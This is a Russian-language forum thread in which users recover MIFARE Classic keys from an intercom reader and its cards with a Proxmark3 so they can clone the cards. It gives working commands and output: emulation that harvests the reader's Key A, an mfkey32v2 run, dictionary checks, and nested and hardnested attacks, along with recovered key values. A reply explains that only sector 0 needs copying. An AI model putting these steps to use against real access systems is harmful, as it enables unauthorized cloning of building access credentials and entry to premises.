[#] ATQA  : 00 04
[#] SAK   : 08
[#] Collected two pairs of AR/NR which can be used to extract keyB from reader for sector 0:
[#] ../tools/mfkey/mfkey32v2 d9be6902 b0eebf17 58cbf77c f38de4e9 a02d11ca 3844912f a2480bc4
[#] Emulator stopped. Tracing: 1  trace length: 1758
[=] Reader is trying authenticate with: Key A, sector 00: [fa561d5720ca]

Создаю файл dd2.dic и закидываю туда выдернутый ключ fa561d5720ca

 

Даю команду перебрать с учётом файла.

[usb] pm3 --> hf mf chk *1 ? d dd2.dic
[+] Loaded  1 keys from dd2.dic
.........................[#] BCC0 incorrect, got 0x86, expected 0x06
[#] Aborting
.......
[=] time in checkkeys 2 seconds

[=] testing to read key B...
[=] Sector 0, First block of sector 0, Num of block 4
[=] Reading block 3
Data:80 43 95 18 C3 F8

[+] found keys:
[+] |-----|----------------|---|----------------|---|
[+] | Sec | key A          |res| key B          |res|
[+] |-----|----------------|---|----------------|---|
[+] | 000 | fa561d5720ca   | 1 | 80439518c3f8   | 1 |
[+] | 001 | ------------   | 0 | ------------   | 0 |
[+] | 002 | ------------   | 0 | ------------   | 0 |
[+] | 003 | ------------   | 0 | ------------   | 0 |
[+] | 004 | ------------   | 0 | ------------   | 0 |
[+] | 005 | ------------   | 0 | ------------   | 0 |
[+] | 006 | ------------   | 0 | ------------   | 0 |
[+] | 007 | ------------   | 0 | ------------   | 0 |
[+] | 008 | ------------   | 0 | ------------   | 0 |
[+] | 009 | ------------   | 0 | ------------   | 0 |
[+] | 010 | ------------   | 0 | ------------   | 0 |
[+] | 011 | ------------   | 0 | ------------   | 0 |
[+] | 012 | ------------   | 0 | ------------   | 0 |
[+] | 013 | ------------   | 0 | ------------   | 0 |
[+] | 014 | ------------   | 0 | ------------   | 0 |
[+] | 015 | ------------   | 0 | ------------   | 0 |
[+] |-----|----------------|---|----------------|---|
[+] ( 0:Failed / 1:Success)
[+] Generating binary key file
[+] Found keys have been dumped to hf-mf-D9BE6902-key.bin
[=] FYI! --> 0xFFFFFFFFFFFF <-- has been inserted for unknown keys where res is 0

0_0 Это как? Откуда взялся key B ??? При этом мгновенно без каких либо 8 часовых пересчётов!

Всё сбросил, повторил с первой картой. Так же ключ B сразу высветился.

Отсюда вопрос.

Зачем команда hf mf staticnested и что она вообще делает? Если hf mf chk даёт тот же результат мгновенно?

Попробую запустить эту команду с другим ключом, может будет результат..

hf mf staticnested 1 1 a a7950bf902bf d

Может получу ключ от 1 блока..

.. не помогло. Никаких изменений.

[the_d_kid 52]

В 11.02.2021 в 20:58, Bespredel сказал:

Пошла мазута по трубам.

Ключ с ридера выдернул с первой попытки.

Команда hf mf sim u 37775126 i x  и proxmark3 к домофону.

Автоматом всё заполнилось и выдал ключ к 0 А.

Далее метку на proxmark3 и команда hf mf staticnested 1 0 key d 

 

А SMKEY умеет ломать такие ключи?

ваш случай, требует копии только 0 сектора. Для всех остальных секторов ключи там для красоты, считка к ним не обращается никогда (в редких случаях ещё и 14 сектор) СМКЕЙ так  и делает, получает от считки один или два ключа, записывает их на заготовку, пишет уид в 0 и 1 блок, и всё работает. 
Не понял, зачем вы начали ломать nested'ом? если можно было hardnested'ом сделать тоже самое за часик наверное, если не меньше. А не за 8 часов.
А что, на айсменовской прошивке команда hf mf sim теперь сама ключи считает? в mfkey грузить не надо? у меня просто официальная стоит, я и не в курсе как там, интересно.

 

В 12.02.2021 в 19:00, Bespredel сказал:

0_0 Это как? Откуда взялся key B ??? При этом мгновенно без каких либо 8 часовых пересчётов!

Всё сбросил, повторил с первой картой. Так же ключ B сразу высветился.

Отсюда вопрос.

Зачем команда hf mf staticnested и что она вообще делает? Если hf mf chk даёт тот же результат мгновенно?

Попробую запустить эту команду с другим ключом, может будет результат..

hf mf staticnested 1 1 a a7950bf902bf d

Может получу ключ от 1 блока..

.. не помогло. Никаких изменений.

иногда ключ B можно прочитать тупо ключом A, зависит от конфигурации ACs сектора. А вообще хрен знает. 
что делает команда staticnested - без понятия, айсменовская какая то фича, я как и говорил - на официалке сижу.
Ознакомьтесь с командой hf mf hardnested короче, много хорошего для себя узнаете) не понимаю как вы ещё не наткнулись на эту замечательную команду. (хотя и она не всегда работает, тогда только sim и sniff в помощь, ключи нужны только те которые сам ридер и отдает.)